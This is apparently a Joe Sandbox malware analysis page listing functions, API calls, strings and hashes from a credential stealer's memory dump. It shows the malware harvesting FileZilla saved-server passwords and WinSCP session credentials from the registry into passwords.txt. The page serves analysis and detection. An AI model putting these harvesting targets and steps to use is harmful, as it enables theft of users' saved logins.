Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35f880b7d9409492cfbd2c31b6ba08b67b52b83fed8c053745051b7244bb587c
Instruction ID: 81b03007a1f881deed44a42fc0175a6fbd256bce6d09bf2effb1e14420dd7128
Opcode Fuzzy Hash: 35f880b7d9409492cfbd2c31b6ba08b67b52b83fed8c053745051b7244bb587c
Instruction Fuzzy Hash: DEE04278A55644DFC741CF58D195E99B7F0EB09368F158199E806DB761C274EE00DF00

Function 00D69D79 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
Instruction ID: d256f1c99479b207678580fcb63197705f640815169115519c5f26934de16b0c
Opcode Fuzzy Hash: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
Instruction Fuzzy Hash: 1AE06C78A61648EFC740CF48C185E49B3F8FB09768F118095E905DB321C378EE00EB50

Function 00D5147A Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
Instruction ID: 6edc1f77bc014f77afb1dd4525fcd7db61d9a3eb149a076bd6fc7a55924a73f3
Opcode Fuzzy Hash: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
Instruction Fuzzy Hash: D9C08C72529208EFD70DCB84D613F5AB3FCE704758F10409CE00293780C67DAB00CA58

Function 00D51492 Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
Instruction ID: 5941d710df6caaa93d6ffa2de60dce8e613dec4f923ccdd24a2439a3e016513d
Opcode Fuzzy Hash: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
Instruction Fuzzy Hash: DAA002315569D48ECE53D7158260F207BB8A741A41F0504D1E491C6863C11CDA50D950

Function 00D5EC8F Relevance: 90.4, APIs: 60, Instructions: 405memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 00D5EB72: lstrlenA.KERNEL32(?,?,?,00000000), ref: 00D5EBAB
Part of subcall function 00D5EB72: strchr.MSVCRT ref: 00D5EBBD

GetProcessHeap.KERNEL32(00000008,?,750A5460,?,00000000), ref: 00D5ECF3
HeapAlloc.KERNEL32(00000000), ref: 00D5ECFA
GetProcessHeap.KERNEL32(00000000,?), ref: 00D5ED0F
HeapFree.KERNEL32(00000000), ref: 00D5ED16
strcpy_s.MSVCRT ref: 00D5ED4C
GetProcessHeap.KERNEL32(00000000,?), ref: 00D5ED5E
HeapFree.KERNEL32(00000000), ref: 00D5ED6B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D5ED9C
HeapFree.KERNEL32(00000000), ref: 00D5EDA3
GetProcessHeap.KERNEL32(00000008,?), ref: 00D5EDAA
HeapAlloc.KERNEL32(00000000), ref: 00D5EDB1
GetProcessHeap.KERNEL32(00000000,?), ref: 00D5EDC6
HeapFree.KERNEL32(00000000), ref: 00D5EDCD
strcpy_s.MSVCRT ref: 00D5EDE8
GetProcessHeap.KERNEL32(00000000,?), ref: 00D5EDFA
HeapFree.KERNEL32(00000000), ref: 00D5EE01
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D5EE1F
HeapFree.KERNEL32(00000000), ref: 00D5EE26
GetProcessHeap.KERNEL32(00000008,?), ref: 00D5EE2D
HeapAlloc.KERNEL32(00000000), ref: 00D5EE34
GetProcessHeap.KERNEL32(00000000,?), ref: 00D5EE49
HeapFree.KERNEL32(00000000), ref: 00D5EE50
strcpy_s.MSVCRT ref: 00D5EE63
GetProcessHeap.KERNEL32(00000000,?), ref: 00D5EE75
HeapFree.KERNEL32(00000000), ref: 00D5EE7C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D5EEA4
HeapFree.KERNEL32(00000000), ref: 00D5EEAB
GetProcessHeap.KERNEL32(00000008,?), ref: 00D5EEB2
HeapAlloc.KERNEL32(00000000), ref: 00D5EEB9
GetProcessHeap.KERNEL32(00000000,?), ref: 00D5EED4
HeapFree.KERNEL32(00000000), ref: 00D5EEDB
strcpy_s.MSVCRT ref: 00D5EEEE
GetProcessHeap.KERNEL32(00000000,?), ref: 00D5EF00
HeapFree.KERNEL32(00000000), ref: 00D5EF07
lstrlenA.KERNEL32(00000000), ref: 00D5EF10
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00D5EF23
HeapAlloc.KERNEL32(00000000), ref: 00D5EF2A
lstrlenA.KERNEL32(?), ref: 00D5EF47
strcpy_s.MSVCRT ref: 00D5EF7A
GetProcessHeap.KERNEL32(00000000,?,00000001,00000001), ref: 00D5EFA0
HeapFree.KERNEL32(00000000), ref: 00D5EFA7
lstrlenA.KERNEL32(?), ref: 00D5EFAC
GetProcessHeap.KERNEL32(00000008,00000001), ref: 00D5EFBB
HeapAlloc.KERNEL32(00000000), ref: 00D5EFC2
GetProcessHeap.KERNEL32(00000000,?), ref: 00D5EFD6
HeapFree.KERNEL32(00000000), ref: 00D5EFDD
strcpy_s.MSVCRT ref: 00D5EFEB
GetProcessHeap.KERNEL32(00000000,?), ref: 00D5EFF8
HeapFree.KERNEL32(00000000), ref: 00D5EFFF
GetProcessHeap.KERNEL32(00000000,?), ref: 00D5F034
HeapFree.KERNEL32(00000000), ref: 00D5F03B
GetProcessHeap.KERNEL32(00000008,?), ref: 00D5F042
HeapAlloc.KERNEL32(00000000), ref: 00D5F049
strcpy_s.MSVCRT ref: 00D5F064
GetProcessHeap.KERNEL32(00000000,?), ref: 00D5F076
HeapFree.KERNEL32(00000000), ref: 00D5F07D
GetProcessHeap.KERNEL32(00000000,?), ref: 00D5F11E
HeapFree.KERNEL32(00000000), ref: 00D5F125

Part of subcall function 00D5EB72: strchr.MSVCRT ref: 00D5EBE2
Part of subcall function 00D5EB72: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D5ECE6,?), ref: 00D5EC04
Part of subcall function 00D5EB72: GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,00D5ECE6), ref: 00D5EC11
Part of subcall function 00D5EB72: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00D5ECE6,?), ref: 00D5EC18
Part of subcall function 00D5EB72: strcpy_s.MSVCRT ref: 00D5EC5E

GetProcessHeap.KERNEL32(00000000,?), ref: 00D5F16F
HeapFree.KERNEL32(00000000), ref: 00D5F176

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$Allocstrcpy_s$lstrlen$strchr
String ID:
API String ID: 1812599741-0
Opcode ID: be4c103d39b28ac953fc51123aec2925e2fdd770d49db7109280458533f72638
Instruction ID: 500a48b893556b652b0844ec8b0d67175e151080308a20f5804772d910e497f6
Opcode Fuzzy Hash: be4c103d39b28ac953fc51123aec2925e2fdd770d49db7109280458533f72638
Instruction Fuzzy Hash: 3AE1EC72C04218AFDF21AFF4DC49A9DBB79FF08301F14446AFA15E7112DA7559889F60

Function 00D5F6CB Relevance: 70.3, APIs: 30, Strings: 10, Instructions: 292stringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00D62143: lstrcpyA.KERNEL32(00000000,00000000,?,00D68FC1,00D87786,?,?,?,?,00D69D6E), ref: 00D62169

Part of subcall function 00D63A18: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00D63A59

Part of subcall function 00D62223: lstrcpyA.KERNEL32(00000000,?,0000000C,00D69228,00D87803), ref: 00D62251
Part of subcall function 00D62223: lstrcatA.KERNEL32(?,?), ref: 00D6225B

Part of subcall function 00D621E9: lstrcpyA.KERNEL32(00000000,?,?,00D68FEB,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62219

Part of subcall function 00D62265: lstrlenA.KERNEL32(?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62279
Part of subcall function 00D62265: lstrcpyA.KERNEL32(00000000,?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622A1
Part of subcall function 00D62265: lstrcatA.KERNEL32(?,00000000,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622AC

Part of subcall function 00D62175: lstrcpyA.KERNEL32(00000000,?,?,00D51CF7,?,00D69260), ref: 00D62194

Part of subcall function 00D59148: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,00D5F752,?,?,?), ref: 00D59163
Part of subcall function 00D59148: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00D5F752,?,?,?), ref: 00D5917A
Part of subcall function 00D59148: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00D5F752,?,?,?), ref: 00D59191
Part of subcall function 00D59148: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00D5F752,?,?,?), ref: 00D591A8
Part of subcall function 00D59148: CloseHandle.KERNEL32(?,?,?,?,?,00D5F752,?,?,?), ref: 00D591D0

Part of subcall function 00D63A7B: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00D68680,?), ref: 00D63A93

strtok_s.MSVCRT ref: 00D5F77A
GetProcessHeap.KERNEL32(00000000,000F423F,00D879E7,00D879D7,00D879D6,00D879D3), ref: 00D5F7C0
HeapAlloc.KERNEL32(00000000), ref: 00D5F7C7
StrStrA.SHLWAPI(00000000,<Host>), ref: 00D5F7DB
lstrlenA.KERNEL32(00000000), ref: 00D5F7E6
StrStrA.SHLWAPI(00000000,<Port>), ref: 00D5F81A
lstrlenA.KERNEL32(00000000), ref: 00D5F825
StrStrA.SHLWAPI(00000000,<User>), ref: 00D5F853
lstrlenA.KERNEL32(00000000), ref: 00D5F85E
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00D5F88C
lstrlenA.KERNEL32(00000000), ref: 00D5F897
lstrlenA.KERNEL32(?), ref: 00D5F902
lstrlenA.KERNEL32(?), ref: 00D5F916
lstrlenA.KERNEL32(00D5FCF9), ref: 00D5FA3E

Part of subcall function 00D68BE6: CreateThread.KERNEL32(00000000,00000000,00D68B15,?,00000000,00000000), ref: 00D68C85
Part of subcall function 00D68BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00D68C8D

Strings

Host: , xrefs: 00D5F955
Password: , xrefs: 00D5F9AF
passwords.txt, xrefs: 00D5FA4E
<Pass encoding="base64">, xrefs: 00D5F886
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 00D5F71B
<User>, xrefs: 00D5F84D
Login: , xrefs: 00D5F98D
<Port>, xrefs: 00D5F814
Soft: FileZilla, xrefs: 00D5F949
<Host>, xrefs: 00D5F7D5

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitstrtok_s
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
API String ID: 4146028692-935134978
Opcode ID: 51c924f003558e1afef5994aac655f82403bef0952be539d20e706f8e9ca5847
Instruction ID: e83a6ad1e48bea22a4aea2c44fb554ff2d4a98163b9a4472c78ef2f2244d732a
Opcode Fuzzy Hash: 51c924f003558e1afef5994aac655f82403bef0952be539d20e706f8e9ca5847
Instruction Fuzzy Hash: BEA10872940219BBCF00BBA0ED4A9AD7B78EF09701F504421FE00B7161DB75AA5E9BB5

Function 00D5B85F Relevance: 58.0, APIs: 32, Strings: 1, Instructions: 211stringmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00D62143: lstrcpyA.KERNEL32(00000000,00000000,?,00D68FC1,00D87786,?,?,?,?,00D69D6E), ref: 00D62169

Part of subcall function 00D62223: lstrcpyA.KERNEL32(00000000,?,0000000C,00D69228,00D87803), ref: 00D62251
Part of subcall function 00D62223: lstrcatA.KERNEL32(?,?), ref: 00D6225B

Part of subcall function 00D621E9: lstrcpyA.KERNEL32(00000000,?,?,00D68FEB,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62219

Part of subcall function 00D62265: lstrlenA.KERNEL32(?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62279
Part of subcall function 00D62265: lstrcpyA.KERNEL32(00000000,?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622A1
Part of subcall function 00D62265: lstrcatA.KERNEL32(?,00000000,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622AC

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00D8856C,00D8788B), ref: 00D5B90A
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,?,?,?,?,?,?,?,?,00D5C76D), ref: 00D5B922
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00D5C76D), ref: 00D5B92A
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00D5C76D), ref: 00D5B936
??_U@YAPAXI@Z.MSVCRT(00000001,?,?,?,?,?,?,?,?,?,?,00D5C76D), ref: 00D5B940
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00D5C76D), ref: 00D5B952
GetProcessHeap.KERNEL32(00000000,000F423F,?,?,?,?,?,?,?,?,?,00D5C76D), ref: 00D5B95E
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00D5C76D), ref: 00D5B965
StrStrA.SHLWAPI(00D5C76D,?,?,?,?,?,?,?,?,?,00D5C76D), ref: 00D5B976
StrStrA.SHLWAPI(-00000010,?,?,?,?,?,?,?,?,?,00D5C76D), ref: 00D5B990
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00D5C76D), ref: 00D5B9A3
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00D5C76D), ref: 00D5B9AD
lstrcatA.KERNEL32(00000000,00D88570,?,?,?,?,?,?,?,?,?,00D5C76D), ref: 00D5B9B9
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00D5C76D), ref: 00D5B9C3
lstrcatA.KERNEL32(00000000,00D88574,?,?,?,?,?,?,?,?,?,00D5C76D), ref: 00D5B9CF
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00D5C76D), ref: 00D5B9DC
lstrcatA.KERNEL32(00000000,-00000010,?,?,?,?,?,?,?,?,?,00D5C76D), ref: 00D5B9E4
lstrcatA.KERNEL32(00000000,00D88578,?,?,?,?,?,?,?,?,?,00D5C76D), ref: 00D5B9F0
StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,00D5C76D), ref: 00D5BA00
StrStrA.SHLWAPI(00000014,?,?,?,?,?,?,?,?,?,00D5C76D), ref: 00D5BA10
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00D5C76D), ref: 00D5BA23

Part of subcall function 00D5B721: _memset.LIBCMT ref: 00D5B75E
Part of subcall function 00D5B721: lstrlenA.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,00D5BA30), ref: 00D5B779
Part of subcall function 00D5B721: CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 00D5B781
Part of subcall function 00D5B721: _memmove.LIBCMT ref: 00D5B804

lstrcatA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00D5C76D), ref: 00D5BA32
lstrcatA.KERNEL32(00000000,00D8857C,?,?,?,?,?,?,?,?,?,00D5C76D), ref: 00D5BA3E
StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,00D5C76D), ref: 00D5BA4E
StrStrA.SHLWAPI(00000014,?,?,?,?,?,?,?,?,?,00D5C76D), ref: 00D5BA5E
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00D5C76D), ref: 00D5BA71

Part of subcall function 00D5B721: lstrcatA.KERNEL32(00D87883,00D87887,?,00000000,00000000,00000000,00000000,00000014,?,00D5BA30), ref: 00D5B82E
Part of subcall function 00D5B721: lstrcatA.KERNEL32(00D87883,00D8788A,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,00D5BA30), ref: 00D5B844

lstrcatA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00D5C76D), ref: 00D5BA80
lstrcatA.KERNEL32(00000000,00D88580,?,?,?,?,?,?,?,?,?,00D5C76D), ref: 00D5BA8C
lstrcatA.KERNEL32(00000000,00D88584,?,?,?,?,?,?,?,?,?,00D5C76D), ref: 00D5BA98
StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,00D5C76D), ref: 00D5BAA8
lstrlenA.KERNEL32(00000000), ref: 00D5BAC6
CloseHandle.KERNEL32(?), ref: 00D5BAF5

Strings

passwords.txt, xrefs: 00D5BAD2

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$File$lstrcpy$lstrlen$HeapPointer$AllocBinaryCloseCreateCryptHandleProcessReadSizeString_memmove_memset
String ID: passwords.txt
API String ID: 1221571796-347816968
Opcode ID: 94f1eb453774ff99d6565c39beaab7cc41952f680786f7101cf87d209aae341f
Instruction ID: ebb14fb771bfd38422544ea634cecb21928af0565187edd3b4cf448ce2fcd1ca
Opcode Fuzzy Hash: 94f1eb453774ff99d6565c39beaab7cc41952f680786f7101cf87d209aae341f
Instruction Fuzzy Hash: C0716B3254011DBFCB51ABA4ED4ADAE7B78FF4A301B004022FE01A2171DB755A5AEBB5

Function 00D5F182 Relevance: 56.3, APIs: 18, Strings: 14, Instructions: 325registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D5F1B3
_memset.LIBCMT ref: 00D5F1D3
_memset.LIBCMT ref: 00D5F1E4
_memset.LIBCMT ref: 00D5F1F5
RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D5F229
RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 00D5F25A
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D5F272
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D5F299
RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D5F2B9
RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 00D5F2DC
RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,Host: ,Soft: WinSCP,00D879CA), ref: 00D5F375
RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 00D5F3D5

Strings

Software\Martin Prikryl\WinSCP 2\Sessions, xrefs: 00D5F2AF
passwords.txt, xrefs: 00D5F65E
Login: , xrefs: 00D5F455
Soft: WinSCP, xrefs: 00D5F2FA
Password, xrefs: 00D5F511
Host: , xrefs: 00D5F326
Password: , xrefs: 00D5F525
Software\Martin Prikryl\WinSCP 2\Configuration, xrefs: 00D5F207
HostName, xrefs: 00D5F363
UserName, xrefs: 00D5F492
UseMasterPassword, xrefs: 00D5F24A
Security, xrefs: 00D5F24F
PortNumber, xrefs: 00D5F3B9
:22, xrefs: 00D5F429

Memory Dump Source

